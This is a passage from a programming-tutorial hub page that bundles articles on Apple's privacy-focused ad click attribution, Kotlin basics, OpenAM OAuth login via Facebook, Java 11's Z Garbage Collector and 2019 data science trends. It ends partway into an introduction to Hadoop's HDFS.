
How-To Tutorials


Apple proposes a “privacy-focused” ad click attribution model for counting conversions without tracking users

Bhagyashree R
23 May 2019
5 min read
Yesterday, Apple announced a new ad attribution model that aims to strike the right balance between online user privacy and letting advertisers measure the effectiveness of their ad campaigns. This model, named Privacy Preserving Ad Click Attribution, is implemented in WebKit and is offered as an experimental feature in Safari Technology Preview 82+.

Ad attribution model and its privacy concerns

Online advertising is one of the most effective media for businesses to expand their reach and find new customers. An ad click attribution model allows you to analyze which of your many advertising campaigns or marketing channels are leading to actual conversions. Generally, ad attribution is done through cookies and something called “tracking pixels”. Cookies are small data files stored by your browser to remember stateful information, for instance, items added to the shopping cart in an online store. A tracking pixel is a piece of HTML code that is loaded when a user visits a website or opens an email. If proper privacy protections are not employed, websites can use this data for user profiling. What is worse is that this data can also be sent to third parties like data brokers, affiliate networks, and advertising networks. This collection of browsing data across multiple websites is what is referred to as cross-site tracking.

How Apple’s ad attribution aims to help

Apple’s ad attribution model is built directly into the browser and runs on-device. This ensures that the browser vendor is not able to see which advertisements are being clicked or what purchases are being made. The Privacy Preserving Ad Click Attribution model works in three steps:

Storing ad clicks

Under Apple’s Privacy Preserving Ad Click Attribution proposal, the page hosting the ad is responsible for storing ad clicks. It does this via two optional attributes: ‘adDestination’ and ‘adCampaignID’. The ‘adDestination’ attribute is the domain the ad click is navigating the user to, and ‘adCampaignID’ is the identifier of the ad campaign. Neither the browser vendor nor the website is allowed to read the stored ad click data or detect that it exists. This data is stored for a limited time; in the case of WebKit, it is 7 days.

Matching the conversions against stored ad clicks

The second step, matching conversions against stored ad clicks, allows advertisers to understand which of their ad campaigns are the most effective. A conversion is getting the user to perform the action your advertisement is aiming for, for instance, a customer adding an item to the shopping cart or signing up for a new service. In this model, tracking pixels are used to determine which actions taken by the user benefit the business. Data like the location of the user, the time of day, or the value of the conversion is passed to the browser through different parameters. Apple ensures that no sensitive data like names or addresses is stored.

Sending out ad click attribution data

In the last step, the browser reports the existence of the conversion to the website or marketer. After the conversion is matched to an ad, the browser sets a timer at random between 24 and 48 hours before sending a stateless POST request to the advertiser, passing the ad campaign ID and the other parameters within this window. Apple is previewing this model in Safari Technology Preview 82+.
It is also proposing this model as a standard through the W3C Web Platform Incubator Community Group (WICG). The model has received mixed reactions from users. Some think that it can help in reducing online tracking. A Reddit user supporting the initiative said, “Ad companies are not having trouble attributing campaigns. The problem is that small, uncoordinated "privacy" features cause Ad Tech companies to become far more aggressive in how they track users. It's not the companies that lose here, it's you. A standardized, privacy-centric method for companies to accomplish attribution will help end the arms race and move back to a more consumer-friendly model. Small edges are worth a fortune in Ads. This is like the war on drugs. Clamping down and assuming ad companies will walk away is way too optimistic. Instead, they will move deeper into the shadows at whatever the cost.”

Others think that it is not a browser’s responsibility to help online advertising and that a browser should be on the user’s side. “I certainly have never wanted my browser to report ad click attribution,” another Redditor remarked.

Read the full announcement by Apple for more details.

Apple Pay will soon support NFC tags to trigger payments
U.S. Supreme Court ruled 5-4 against Apple on its App Store monopoly case
Apple plans to make notarization a default requirement in all future macOS updates


Getting Started with Kotlin

Brent Watson
08 Mar 2017
6 min read
Kotlin has been gaining more and more attention recently. With its 1.1 release, the language has proved both stable and usable. In this article we’re going to cover a few different things: what Kotlin is and why it has become popular, how to get started, where it’s most effective, and where to go next if you want to learn more.

What is Kotlin?

Kotlin is a programming language, much like Scala or Groovy. It is a language that targets the JVM. It is developed by JetBrains, who make the IDEs that you know and love so much. The same diligence and finesse that is put into IntelliJ, PyCharm, ReSharper, and their many other tools also shines through with Kotlin. There are two secret ingredients that make Kotlin such a joy to use. First, since Kotlin compiles to Java bytecode, it is 100% interoperable with your existing Java code. Second, since JetBrains has control over both the language and the IDE, the tooling support is beyond excellent. Here’s a quick example of some interoperability between Java and Kotlin:

Person.kt

    data class Person(
        val title: String?, // String type ends with “?”, so it is nullable.
        val name: String,   // val's are immutable. “String” field, so non-null.
        var age: Int        // var's are mutable.
    )

PersonDemo.java

    Person person = new Person("Mr.", "John Doe", 23);
    person.getAge();    // data classes provide getters and setters automatically.
    person.toString();  // ... in addition to toString, equals, hashCode, and copy methods.

The above example shows a “data class” (think Value Object / Data Transfer Object) in Kotlin being used by a Java class. Not only does the code work seamlessly, but the JetBrains IDE also allows you to navigate, auto-complete, debug, and refactor these together without skipping a beat. Continuing with the above example, we’ll show how you might filter a list of Person objects using Kotlin.

Filters.kt

    fun demoFilter(people: List<Person>): List<String> {
        return people
            .filter { it.age > 35 }
            .map { it.name }
    }

FiltersApplied.java

    List<String> names = new Filters().demoFilter(people);

The simple addition of higher order functions (such as map, filter, reduce, sum, zip, and so on) in Kotlin greatly reduces the boilerplate code you usually have to write in Java programs when iterating through collections. The above filtering code in Java would require you to create a temporary list of results, iterate through people, perform an if check on age, add the name to the list, then finally return the list.
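For comparison, a rough sketch of that hand-rolled Java version might look like the following. It reuses the Filters and demoFilter names from FiltersApplied.java above; the body itself is illustrative, not code from the original article:

    import java.util.ArrayList;
    import java.util.List;

    // Pre-Java-8 equivalent of the Kotlin filter/map one-liner above.
    // Person is the Kotlin data class from earlier, seen from Java via its generated getters.
    public class Filters {
        public List<String> demoFilter(List<Person> people) {
            List<String> names = new ArrayList<>();     // temporary result list
            for (Person person : people) {              // iterate through people
                if (person.getAge() > 35) {             // the age check
                    names.add(person.getName());        // collect the name
                }
            }
            return names;                               // finally, return the list
        }
    }

Every line of that disappears into the single filter/map chain in Kotlin.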
The Kotlin version is not only one line, but it can actually be reduced even further, since Kotlin supports Single Expression Functions:

    fun demoFilter(people: List<Person>) = people.filter { it.age > 35 }.map { it.name }
    // return type and return keyword replaced with “=”.

Another Kotlin feature that greatly reduces the boilerplate found in Java code comes from its more advanced type system, which treats nullable types differently from non-null types. The Java version of:

    if (people != null && !people.isEmpty() && people.get(0).getAddress() != null
            && people.get(0).getAddress().getStreet() != null) {
        return people.get(0).getAddress().getStreet();
    }

Using Kotlin’s “?” operator, which checks for null before continuing to evaluate an expression, we can simplify this statement drastically:

    return people?.firstOrNull()?.address?.street

Not only does this reduce the verbosity inherent in Java, but it also helps to eliminate the “billion dollar mistake” in Java: NullPointerExceptions. The ability to mark a type as either nullable or non-null (Address? vs Address) means that the compiler can ensure null checks are properly done at compile time, not at runtime in production. These are just a couple of examples of how Kotlin helps to both reduce the number of lines in your code and reduce often unneeded complexity. The more you use Kotlin, the more of these idioms you will find hard to live without.

Android

More than in any other industry, Kotlin has gained the most ground with Android developers. Since Kotlin compiles to Java 6 bytecode, it can be used to build Android applications. And since the interoperability between Kotlin and Java is so simple, it can be slowly added into a larger Java Android project over time (or any Java project, for that matter). Given that Android developers do not yet have access to the nice features of Java 8, Kotlin provides these and gives Android developers many of the new language features they otherwise can only read about. The Kotlin team realized this early on and has provided many libraries and tools targeted at Android devs. Here are a couple of short examples of how Kotlin can simplify working with the Android SDK:

    context.runOnUiThread { ... }
    button?.setOnClickListener { Toast.makeText(...) }

Android developers will immediately understand the reduced boilerplate here. If you are not an Android developer, trust me, this is much better. If you are an Android developer, I would suggest you take a look at both Kotlin Android Extensions and Anko.

Extension Functions

The last feature of Kotlin we will look at today is one of the most useful: the ability to write Extension Functions. Think of these as the ability to add your own method to any existing class. Here is a quick example of extending Java’s String class to add a prepend method:

    fun String.prepend(str: String) = str + this

Once imported, you can use this from any Kotlin code as though it were a method on String. Consider the ability to extend any system or framework class. Suddenly all of your utility methods become extension methods and your code starts to look intentionally designed instead of patched together. Maybe you’d like to add a dpToPx() method on your Android Context class. Or maybe you’d like to add a subscribeOnNewObserveOnMain() method on your RxJava Observable class. Well, now you can.

Next Steps

If you’re interested in trying Kotlin, grab a copy of the IntelliJ IDEA IDE or Android Studio and install the Kotlin plugin to get started. There is also a very well built online IDE maintained by JetBrains, along with a series of exercises called Kotlin Koans. These can be found at http://try.kotlinlang.org/. For more information on Kotlin, check out https://kotlinlang.org/.

About the author

Brent Watson is an Android engineer in NYC. He is a developer, entrepreneur, author, TEDx speaker, and Kotlin advocate. He can be found at http://brentwatson.com/.


OAuth Authentication

Packt
02 Sep 2013
6 min read
(For more resources related to this topic, see here.)

Understanding OAuth

OAuth has the concept of Providers and Clients. An OAuth Provider is like a SAML Identity Provider, and is the place where the user enters their authentication credentials. Typical OAuth Providers include Facebook and Google. An OAuth Client is the party that wants to protect its resources, much like a SAML Service Provider. If you have ever been to a site that has asked you to log in using your Twitter or LinkedIn credentials, then odds are that site was using OAuth. The advantage of OAuth is that a user’s authentication credentials (username and password, for instance) are never passed to the OAuth Client, just a range of tokens that the Client requested from the Provider and which are authorized by the user. OpenAM can act as both an OAuth Provider and an OAuth Client. This chapter will focus on using OpenAM as an OAuth Client and using Facebook as an OAuth Provider.

Preparing Facebook as an OAuth Provider

Head to https://developers.facebook.com/apps/ and create a Facebook App. Once this is created, your Facebook App will have an App ID and an App Secret. We’ll use these later on when configuring OpenAM. Facebook won’t redirect to a URL (such as our OpenAM installation) without being aware of that URL. The steps for preparing Facebook as an OAuth provider are as follows:

1. Under the settings for the App, in the section Website with Facebook Login, we need to add a Site URL. This is a special OpenAM OAuth Proxy URL, which for me was http://openam.kenning.co.nz:8080/openam/oauth2c/OAuthProxy.jsp as shown in the following screenshot:
2. Click on the Save Changes button on Facebook.

My OpenAM installation for this chapter was directly available on the Internet, just in case Facebook checked for a valid URL destination.

Configuring an OAuth authentication module

OpenAM has the concept of authentication modules, which support different ways of authenticating, such as OAuth, against its Data Store, against LDAP, or against a Web Service. We need to create a new Module Instance for our Facebook OAuth Client.

1. Log in to the OpenAM console.
2. Click on the Access Control tab, and click on the link to the realm / (Top Level Realm).
3. Click on the Authentication tab and scroll down to the Module Instances section.
4. Click on the New button.
5. Enter a name for the New Module Instance, select OAuth 2.0 as the Type, and click on the OK button. I used the name Facebook. You will then see a screen as shown:
6. For Client Id, use the App ID value provided by Facebook. For the Client Secret, use the App Secret value provided by Facebook as shown in the preceding screenshot.
7. Since we’re using Facebook as our OAuth Provider, we can leave the Authentication Endpoint URL, Access Token Endpoint URL, and User Profile Service URL values at their defaults.
8. Scope defines the permissions we’re requesting from the OAuth Provider on behalf of the user. These values will be provided by the OAuth Provider, but we’ll use the default values of email and read_stream as shown in the preceding screenshot.
9. Proxy URL is the URL we copied to Facebook as the Site URL. This needs to be replaced with your OpenAM installation value.
10. The Account Mapper Configuration allows you to map values from your OAuth Provider to values that OpenAM recognizes. For instance, Facebook calls emails email, while OpenAM references values from the directory it is connected to, such as mail in the case of the embedded LDAP server. The same goes for the Attribute Mapper Configuration.
11. We’ll leave all these sections at their defaults as shown in the preceding screenshot.
12. OpenAM allows attributes passed from the OAuth Provider to be saved to the OpenAM session. We’ll make sure this option is Enabled as shown in the preceding screenshot.
13. When a user authenticates against an OAuth Provider, they are likely to not already have an account with OpenAM. If they do not have a valid OpenAM account, they will not be allowed access to resources protected by OpenAM. We should make sure that the option to Create account if it does not exist is Enabled as shown in the preceding screenshot.

Forcing authentication against particular authentication modules

While writing this book I disabled the Create account if it does not exist option during testing. Then, when I tried to log into OpenAM, I was redirected to Facebook, which passed my credentials to OpenAM. Since there was no valid OpenAM account that matched my Facebook credentials, I could not log in. Thankfully, you can force a login using a particular authentication module by adjusting the login URL. By using http://openam.kenning.co.nz:8080/openam/UI/Login?module=DataStore, I was able to use the Data Store rather than the OAuth authentication module, and log in successfully. For your own testing, it would be recommended to use http://openam.kenning.co.nz:8080/openam/UI/Login?module=Facebook rather than changing your authentication chain.

14. For our newly created accounts, we can choose to prompt the user to create a password and enter an activation code. For our prototype we’ll leave this option as Disabled.
15. The flip side to Single Sign On is Single Log Out. Your OAuth Provider should provide a logout URL, which we could call to log out a user when they log out of OpenAM. The options we have when a user logs out of OpenAM are to not log them out of the OAuth Provider, to log them out of the OAuth Provider, or to ask the user.
16. If we had set earlier that we wanted to enforce password and activation token policies, we would need to enter details of an SMTP server, which would be used to email the activation token to the user. For the purposes of our prototype we’ll leave all these options blank.
17. Click on the Save button.

Summary

This article served as a quick primer on what OAuth is and how to achieve it with OpenAM. It covered using Facebook as an OAuth Provider and configuring an OAuth authentication module, focusing on using OpenAM as an OAuth Client with Facebook as the OAuth Provider. This is useful when we want to allow authentication against Facebook or Google.

Resources for Article:

Further resources on this subject:
Getting Started with OpenSSO [Article]
OpenAM: Oracle DSEE and Multiple Data Stores [Article]
OpenAM Identity Stores: Types, Supported Types, Caching and Notification [Article]


Getting started with Z Garbage Collector (ZGC) in Java 11 [Tutorial]

Vincy Davis
13 Jun 2019
9 min read
Java 11 includes a lot of improvements and changes in the GC (Garbage Collection) domain. Z Garbage Collector (ZGC) is scalable, with low latency. It is a completely new GC, written from scratch. It can work with heap sizes ranging from kilobytes to multi-terabyte memory. As a concurrent garbage collector, ZGC promises not to add more than 10 milliseconds to application latency, even for bigger heap sizes. It is also easy to tune. It was released with Java 11 as an experimental GC. Work on this GC is in progress in OpenJDK, and more changes can be expected over time. This article is an excerpt taken from the book Java 11 and 12 - New Features, written by Mala Gupta. In this book, you will learn the latest developments in Java, right from variable type inference and simplified multithreading through to performance improvements, and much more. In this article, you will understand the need for ZGC, its features, how it works, the ZGC heap, ZGC phases, and colored pointers.

Need for Z Garbage Collector

One of the features that resulted in the rise of Java in the early days was its automatic memory management with its GCs, which freed developers from manual memory management and lowered memory leaks. However, with unpredictable timings and durations, garbage collection can (at times) do more harm to an application than good. Increased latency directly affects the throughput and performance of an application. With ever-decreasing hardware costs and programs engineered to use largish memories, applications are demanding lower latency and higher throughput from garbage collectors. ZGC promises a latency of no more than 10 milliseconds, which doesn't increase with heap size or a live set. This is because its stop-the-world pauses are limited to root scanning.

Features of Z Garbage Collector

ZGC brings in a lot of features, which have been instrumental in its proposal, design, and implementation. One of the most outstanding features of ZGC is that it is a concurrent GC. Other features include:

- It can mark memory and copy and relocate it, all concurrently. It also has a concurrent reference processor.
- As opposed to the store barriers used by other HotSpot GCs, ZGC uses load barriers. The load barriers are used to keep track of heap usage.
- One of the intriguing features of ZGC is the usage of load barriers with colored pointers. This is what enables ZGC to perform concurrent operations while Java threads are running, such as object relocation or relocation set selection.
- ZGC is more flexible in configuring its size and scheme. Compared to G1, ZGC has better ways to deal with very large object allocations.
- ZGC is a single-generation GC. It also supports partial compaction.
- ZGC is also highly performant when it comes to reclaiming memory and reallocating it.
- ZGC is NUMA-aware, which essentially means that it has a NUMA-aware memory allocator.

Getting started with Z Garbage Collector

Working with ZGC involves multiple steps. The JDK binary should be installed (it is specific to Linux/x64), then built and started. The following commands can be used to download ZGC and build it on your system:

    $ hg clone http://hg.openjdk.java.net/jdk/jdk
    $ cd zgc
    $ sh configure --with-jvm-features=zgc
    $ make images

After executing the preceding commands, the JDK root directory can be found in the following location:

    ./build/linux-x86_64-normal-server-release/images/jdk

Java tools such as java, javac, and others can be found in the /bin subdirectory of the preceding path (its usual location).
Let's create a basic HelloZGC class, as follows:

    class HelloZGC {
        public static void main(String[] args) {
            System.out.println("Say hello to new low pause GC - ZGC!");
        }
    }

The following command can be used to enable ZGC and use it:

    java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC HelloZGC

Since ZGC is an experimental GC, the user needs to unlock it using the runtime option -XX:+UnlockExperimentalVMOptions. For enabling basic GC logging, the user can add the -Xlog:gc option. Detailed logging is helpful while fine-tuning an application. The user can enable it by using the -Xlog:gc* option as follows:

    java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC -Xlog:gc* HelloZGC

The previous command will output all the logs to the console, which could make it difficult to search for specific content. The user can specify that the logs be written to a file as follows:

    java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC -Xlog:gc*:mylog.log HelloZGC

Z Garbage Collector heap

ZGC divides memory into regions, also called ZPages. ZPages can be dynamically created and destroyed. They can also be dynamically sized (unlike in the G1 GC), in multiples of 2 MB. Here are the size groups of heap regions:

- Small (2 MB)
- Medium (32 MB)
- Large (N * 2 MB)

The ZGC heap can have multiple occurrences of these heap regions. The medium and large regions are allocated contiguously, as shown in the following diagram. Unlike other GCs, the physical heap regions of ZGC can map into a bigger heap address space (which can include virtual memory). This can be crucial to combat memory fragmentation issues. Imagine that the user wants to allocate a really big object in memory but can't do so due to the unavailability of contiguous space in memory. This often leads to multiple GC cycles to free up enough contiguous space. If none is available, even after (multiple) GC cycle(s), the JVM will shut down with OutOfMemoryError. However, this particular use case is not an issue with ZGC. Since the physical memory maps to a bigger address space, locating a bigger contiguous space is feasible.

Z Garbage Collector phases

A GC cycle of ZGC includes multiple phases:

- Pause Mark Start
- Pause Mark End
- Pause Relocate Start

In the first phase, Pause Mark Start, ZGC marks objects that have been pointed to by roots. This includes walking through the live set of objects, and then finding and marking them. This is by far one of the most heavy-duty workloads in the ZGC GC cycle. Once this completes, the next phase is Pause Mark End, which is used for synchronization and starts with a short pause of 1 ms. In this second phase, ZGC starts with reference processing and moves to weak-root cleaning. It also includes the relocation set selection: ZGC marks the regions it wants to compact. The next step, Pause Relocate Start, triggers the actual region compaction. It begins with root scanning pointing into the relocation set, followed by the concurrent relocation of objects in the relocation set. The first phase, Pause Mark Start, also includes remapping the live data. Since marking and remapping of live data is the most heavy-duty GC operation, it isn't executed as a separate phase. Remapping starts after Pause Relocate Start but overlaps with the Pause Mark Start phase of the next GC cycle.
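To see these pauses and the concurrent work between them in practice, you can run an allocation-heavy toy program with the logging flags shown earlier. The sketch below is illustrative only; the class name, allocation sizes, and retention policy are arbitrary choices, not part of the book excerpt.

    import java.util.ArrayList;
    import java.util.List;

    // Illustrative allocation churn: most arrays become garbage immediately,
    // while a small rotating set stays live so the marking phases have work to do.
    public class ZgcPressure {
        public static void main(String[] args) {
            List<byte[]> retained = new ArrayList<>();
            for (int i = 0; i < 200_000; i++) {
                byte[] chunk = new byte[64 * 1024];
                if (i % 100 == 0) {
                    retained.add(chunk);
                    if (retained.size() > 256) {
                        retained.remove(0); // keep the live set bounded
                    }
                }
            }
            System.out.println("Retained " + retained.size() + " chunks");
        }
    }

Running it with java -XX:+UnlockExperimentalVMOptions -XX:+UseZGC -Xlog:gc* ZgcPressure should interleave Pause Mark Start, Pause Mark End, and Pause Relocate Start entries with the concurrent phases in the log.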
Colored pointers

Colored pointers are one of the core concepts of ZGC. They enable ZGC to find, mark, locate, and remap objects. ZGC doesn't support x32 platforms. Implementation of colored pointers needs virtual address masking, which could be accomplished either in hardware, in the operating system, or in software. The following diagram shows the 64-bit pointer layout. The 64-bit object reference is divided as follows:

- 18 bits: Unused bits
- 1 bit: Finalizable
- 1 bit: Remapped
- 1 bit: Marked1
- 1 bit: Marked0
- 42 bits: Object Address

The first 18 bits are reserved for future use. The 42 bits can address up to 4 TB of address space. Now come the remaining, intriguing, 4 bits. The Marked1 and Marked0 bits are used to mark objects for garbage collection. By setting the single Remapped bit, an object can be marked as not pointing into the relocation set. The last bit, Finalizable, relates to concurrent reference processing. It marks that an object is only reachable through a finalizer. When the user runs ZGC on a system, they will notice that it uses a lot of virtual memory space, which is not the same as the physical memory space. This is due to heap multi-mapping. It specifies how the objects with the colored pointers are stored in virtual memory. As an example, for a colorless pointer, say 0x0000000011111111, its colored pointers would be 0x0000100011111111 (Remapped bit set), 0x0000080011111111 (Marked1 bit set), and 0x0000040011111111 (Marked0 bit set). The same physical heap memory would map to three different locations in the address space, each corresponding to one colored pointer. This would be implemented differently when the mapping is handled differently.

Tuning Z Garbage Collector

To get optimal performance, set up a heap size that can not only store the live set of your application but also has enough headroom to service allocations. ZGC is a concurrent garbage collector. By setting the amount of CPU time that should be assigned to ZGC threads, the user can control how often the GC kicks in. This can be done using the following option:

    -XX:ConcGCThreads=<number>

A higher value for the ConcGCThreads option will leave less CPU time for your application. On the other hand, a lower value may result in your application struggling for memory; your application might generate more garbage than ZGC collects. ZGC can also use default values for ConcGCThreads. To fine-tune your application on this parameter, you might prefer to experiment with test values. For advanced ZGC tuning, the user can also enable large pages for enhanced performance of the application. This can be done using the following option:

    -XX:+UseLargePages

Instead of enabling large pages, the user can also enable transparent huge pages by using the following option:

    -XX:+UseTransparentHugePages

The preceding option also involves additional settings and configurations, which can be found on ZGC's official wiki page. ZGC is a NUMA-aware GC. Applications executing on NUMA machines can see a noticeable performance gain. By default, NUMA support is enabled for ZGC. However, if the JVM realizes that it is bound to only a subset of the CPUs in the machine, this feature is disabled. To override the JVM's decision, the following option can be used:

    -XX:+UseNUMA

Summary

We have briefly discussed the scalable, low latency GC for OpenJDK: ZGC. It is an experimental GC, which has been written from scratch. As a concurrent GC, it promises max latency of less than 10 milliseconds, which doesn't increase with heap size or live data. At present, it only works with Linux/x64.
More platforms can be supported in the future if there is considerable demand. To know more about the applicability of Java's new features, head over to the book, Java 11 and 12 – New Features.

Using lambda expressions in Java 11 [Tutorial]
Creating a simple modular application in Java 11 [Tutorial]
Java 11 is here with TLS 1.3, Unicode 11, and more updates


Quantum computing, edge analytics, and meta learning: key trends in data science and big data in 2019

Richard Gall
18 Dec 2018
11 min read
When historians study contemporary notions of data in the early 21st century, 2018 might well be a landmark year. In many ways this was the year when Big and Important Issues - from the personal to the political - began to surface. The techlash, a term which has defined the year, arguably emerged from conversations and debates about the uses and abuses of data. But while cynicism casts a shadow on the brightly lit data science landscape, there’s still a lot of optimism out there. And more importantly, data isn’t going to drop off the agenda any time soon. However, the changing conversation in 2018 does mean that the way data scientists, analysts, and engineers use data and build solutions for it will change. A renewed emphasis on ethics and security is now appearing, which will likely shape 2019 trends. But what will these trends be? Let’s take a look at some of the most important areas to keep an eye on in the new year.

Meta learning and automated machine learning

One of the key themes of data science and artificial intelligence in 2019 will be doing more with less. There are a number of ways in which this will manifest itself. The first is meta learning. This is a concept that aims to improve the way that machine learning systems actually work by running machine learning on machine learning systems. Essentially this allows a machine learning algorithm to learn how to learn. By doing this, you can better decide which algorithm is most appropriate for a given problem. Find out how to put meta learning into practice. Learn with Hands-On Meta Learning with Python. Automated machine learning is closely aligned with meta learning. One way of understanding it is to see it as automating the application of meta learning. So, if meta learning can help better determine which machine learning algorithms should be applied and how they should be designed, automated machine learning makes that process a little smoother. It builds the decision making into the machine learning solution. Fundamentally, it’s all about “algorithm selection, hyper-parameter tuning, iterative modelling, and model assessment,” as Matthew Mayo explains on KDnuggets.

Automated machine learning tools

What’s particularly exciting about automated machine learning is that there are already a number of tools that make it relatively easy to do. AutoML is a set of tools developed by Google that can be used on the Google Cloud Platform, while auto-sklearn, built around the scikit-learn library, provides a similar out-of-the-box solution for automated machine learning. Although both AutoML and auto-sklearn are very new, there are newer tools available that could dominate the landscape: AutoKeras and AdaNet. AutoKeras is built on Keras (the Python neural network library), while AdaNet is built on TensorFlow. Both could be more affordable open source alternatives to AutoML. Which automated machine learning library gains the most popularity remains to be seen, but one thing is certain: it makes deep learning accessible to many organizations who previously wouldn’t have had the resources or inclination to hire a team of PhD computer scientists. But it’s important to remember that automated machine learning certainly doesn’t mean automated data science. While tools like AutoML will help many organizations build deep learning models for basic tasks, for organizations that need a more developed data strategy, the role of the data scientist will remain vital.
You can’t, after all, automate away strategy and decision making. Learn automated machine learning with these titles:
Hands-On Automated Machine Learning
TensorFlow 1.x Deep Learning Cookbook

Quantum computing

Quantum computing, even as a concept, feels almost fantastical. It's not just cutting-edge, it's mind-bending. But in real-world terms it also continues the theme of doing more with less. Explaining quantum computing can be tricky, but the fundamentals are this: instead of a binary system (the foundation of computing as we currently know it), which can be either 0 or 1, in a quantum system you have qubits, which can be 0, 1 or both simultaneously. (If you want to learn more, read this article.)

What quantum computing means for developers

So, what does this mean in practice? Essentially, because the qubits in a quantum system can be multiple things at the same time, you are then able to run much more complex computations. Think about the difference in scale: running a deep learning system on a binary system has clear limits. Yes, you can scale up in processing power, but you’re nevertheless constrained by the foundational fact of zeros and ones. In a quantum system where that restriction no longer exists, the scale of the computing power at your disposal increases astronomically. Once you understand the fundamental proposition, it becomes much easier to see why the likes of IBM and Google are clamouring to develop and deploy quantum technology. One of the most talked about use cases is using quantum computers to find even larger prime numbers (a move which carries risks, given prime numbers are the basis for much modern encryption). But there are other applications, such as in chemistry, where complex subatomic interactions are too detailed to be modelled by a traditional computer. It’s important to note that quantum computing is still very much in its infancy. While Google and IBM are leading the way, they are really only researching the area. It certainly hasn’t been deployed or applied in any significant or sustained way. But this isn’t to say that it should be ignored. It’s going to have a huge impact on the future, and more importantly it’s plain interesting. Even if you don’t think you’ll be getting to grips with quantum systems at work for some time (a decade at best), understanding the principles and how they work in practice will not only give you a solid foundation for major changes in the future, it will also help you better understand some of the existing challenges in scientific computing. And, of course, it will also make you a decent conversationalist at dinner parties.

Who's driving quantum computing forward?

If you want to get started, Microsoft has put together the Quantum Development Kit, which includes the first quantum-specific programming language, Q#. IBM, meanwhile, has developed its own Quantum Experience, which allows engineers and researchers to run quantum computations in the IBM cloud. As you investigate these tools you’ll probably get the sense that no one’s quite sure what to do with these technologies. And that’s fine - if anything it makes it the perfect time to get involved and help further research and thinking on the topic. Get a head start in the quantum computing revolution. Pre-order Mastering Quantum Computing with IBM QX.

Edge analytics and digital twins

While quantum lingers on the horizon, the concept of the edge has quietly planted itself at the very center of the IoT revolution.
IoT might still be the term that business leaders and, indeed, wider society are talking about, but for technologists and engineers, none of its advantages would be possible without the edge. Edge computing or edge analytics is essentially about processing data at the edge of a network rather than within a centralized data warehouse. Again, as you can begin to see, the concept of the edge allows you to do more with less. More speed, less bandwidth (as devices no longer need to communicate with data centers), and, in theory, more data. In the context of IoT, where just about every object in existence could be a source of data, moving processing and analytics to the edge can only be a good thing.

Will the edge replace the cloud?

There's a lot of conversation about whether edge will replace cloud. It won't. But it probably will replace the cloud as the place where we run artificial intelligence. For example, instead of running powerful analytics models in a centralized space, you can run them at different points across the network. This will dramatically improve speed and performance, particularly for those applications that run on artificial intelligence.

A more distributed world

Think of it this way: just as software has become more distributed in the last few years, thanks to the emergence of the edge, data itself is going to be more distributed. We'll have billions of pockets of activity, whether from consumers or industrial machines, each a locus of data generation. Find out how to put the principles of edge analytics into practice: Azure IoT Development Cookbook.

Digital twins

An emerging part of the edge computing and analytics trend is the concept of digital twins. This is, admittedly, still something in its infancy, but in 2019 it’s likely that you’ll be hearing a lot more about digital twins. A digital twin is a digital replica of a device that engineers and software architects can monitor, model, and test. For example, if you have a digital twin of a machine, you could run tests on it to better understand its points of failure. You could also investigate ways you could make the machine more efficient. More importantly, a digital twin can be used to help engineers manage the relationship between the centralized cloud and systems at the edge - the digital twin is essentially a layer of abstraction that allows you to better understand what’s happening at the edge without needing to go into the detail of the system. For those of us working in data science, digital twins provide better clarity and visibility on how disconnected aspects of a network interact. If we’re going to make 2019 the year we use data more intelligently - maybe even more humanely - then this is precisely the sort of thing we need.

Interpretability, explainability, and ethics

Doing more with less might be one of the ongoing themes in data science and big data in 2019, but we can’t ignore the fact that ethics and security will remain firmly on the agenda. It’s easy to dismiss these issues as separate from the technical aspects of data mining, processing, and analytics, but they are, in fact, deeply integrated into them. Key facets of ethics here are two related concepts: explainability and interpretability. The two terms are often used interchangeably, but there are some subtle differences. Explainability is the extent to which the inner workings of an algorithm can be explained in human terms, while interpretability is the extent to which one can understand the way in which it is working (e.g.
predict the outcome in a given situation). So, an algorithm can be interpretable, but you might not quite be able to explain why something is happening. (Think about this in the context of scientific research: sometimes, scientists know that a thing is definitely happening, but they can’t provide a clear explanation for why.)

Improving transparency and accountability

Either way, interpretability and explainability are important because they can help to improve transparency in machine learning and deep learning algorithms. In a world where deep learning algorithms are being applied to problems in areas from medicine to justice - where the problem of accountability is particularly fraught - this transparency isn’t an option, it’s essential. In practice, this means engineers must tweak the algorithm development process to make it easier for those outside the process to understand why certain things are happening and why they aren’t. To a certain extent, this ultimately requires the data science world to take the scientific method more seriously than it has done. Rather than just aiming for accuracy (which is itself often open to contestation), the aim is to constantly manage the gap between what we’re trying to achieve with an algorithm and how it actually goes about doing it. You can learn the basics of building explainable machine learning models in the Getting Started with Machine Learning in Python video.

Transparency and innovation must go hand in hand in 2019

So, there are two fundamental things for data science in 2019: improving efficiency, and improving transparency. Although the two concepts might look like they conflict with each other, it's actually a bit of a false dichotomy. If we had realised that 12 months ago, we might have avoided many of the issues that have come to light this year. Transparency has to be a core consideration for anyone developing systems for analyzing and processing data. Without it, the work you’re doing might be flawed or unnecessary, and you’ll only need further iterations to rectify your mistakes or mitigate the impact of your biases. With this in mind, now is the time to learn the lessons of 2018’s techlash. We need to commit to stopping the miserable conveyor belt of scandal and failure. Now is the time to find new ways to build better artificial intelligence systems.


What makes Hadoop so revolutionary?

Packt
20 Feb 2018
17 min read
In this article by Sourav Gulati and Sumit Kumar, authors of the book Apache Spark 2.x for Java Developers, we look at Hadoop, which in the classical sense comprises two components: a storage layer called HDFS and a processing layer called MapReduce. Prior to Hadoop 2.x, resource management was done by the MapReduce framework of Hadoop itself; however, that changed with the introduction of YARN. In Hadoop 2.0, YARN was introduced as the third component of Hadoop, to manage the resources of the Hadoop cluster and make the platform more MapReduce-agnostic. (For more resources related to this topic, see here.)

HDFS

Hadoop Distributed File System, as the name suggests, is a distributed file system along the lines of the Google File System, written in Java. In practice, HDFS closely resembles any other UNIX file system, with support for common file operations like ls, cp, rm, du, cat, and so on. However, what makes HDFS stand out, despite its simplicity, is its mechanism for handling node failure in a Hadoop cluster without effectively changing the seek time for accessing stored files. An HDFS cluster consists of two major components: Data Nodes and a Name Node. HDFS has a unique way of storing data on HDFS clusters (cheap, networked commodity computers). It splits a regular file into smaller chunks called blocks and then makes a number of copies of each chunk, depending on the replication factor for that file. After that, it copies the chunks to different Data Nodes of the cluster.

Name Node

